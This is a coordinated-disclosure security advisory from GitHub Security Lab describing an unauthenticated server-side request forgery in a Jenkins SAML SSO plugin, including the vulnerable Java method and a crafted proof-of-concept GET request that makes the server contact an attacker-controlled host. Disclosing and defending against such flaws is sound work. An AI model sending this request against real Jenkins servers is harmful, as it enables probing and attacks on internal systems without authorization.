GHSL-2023-074: Server-Side Request Forgery (SSRF) in miniorange-saml-sp-plugin - CVE-2023-32991, CVE-2023-32992

Coordinated Disclosure Timeline

• 2023-04-11: Issue reported to the Jenkins Security team.
• 2023-05-16: Advisory published (fixed in SAML Single Sign On(SSO) Plugin 2.1.0).

Summary

A Server-Side Request Forgery (SSRF) vulnerability was found in the miniorange-saml-sp-plugin. The vulnerability resides in the org.miniorange.saml.MoSAMLAddIdp#doValidateMetadataUrl method and can be exploited without authentication. An attacker can leverage this vulnerability to send requests to arbitrary hosts.

Product

SAML Single Sign On (SSO) Jenkins plugin

Tested Version

Jenkins SAML SSO Release 2.0.2

Details

SSRF in org.miniorange.saml.MoSAMLAddIdp#doValidateMetadataUrl (GHSL-2023-074)

The doValidateMetadataUrl method in the MoSAMLAddIdp.java file lacks proper validation and sanitization of user input for the metadataUrl parameter, allowing a blind exploitation of a server-side request forgery (SSRF).

Affected source code: MoSAMLAddIdp.java

        public FormValidation doValidateMetadataUrl(@QueryParameter String metadataUrl) throws Exception {
            String metadata = sendGetRequest(metadataUrl);
            try{
                List<String> metadataUrlValues = configureFromMetadata(metadata);
            }catch (Exception e){
                LOGGER.fine("Invalid metadata Url" + e);
                return FormValidation.error("Invalid metadata Url");
            }
            return FormValidation.okWithMarkup("Valid metadata Url, please hit save button");
        }

In order to exploit the vulnerability, an attacker may send the following crafted request:

GET /jenkins/descriptorByName/org.miniorange.saml.MoSAMLAddIdp/validateMetadataUrl?metadataUrl=http:%2f%2fattacker.oastify.com HTTP/1.1
Host: localhost:8080
Connection: close

This vulnerability was found using CodeQL’s SSRF Java query.

Impact

This issue may lead to server-side request forgery.

CVE

• CVE-2023-32991 (CSRF)
• CVE-2023-32992 (missing permission check)

Resources

• SECURITY-3120
• SECURITY-2993

Credit

This issue was discovered and reported by GHSL team member @pwntester (Alvaro Muñoz).

Contact

You can contact the GHSL team at securitylab@github.com, please include a reference to GHSL-2023-074 in any communication regarding this issue.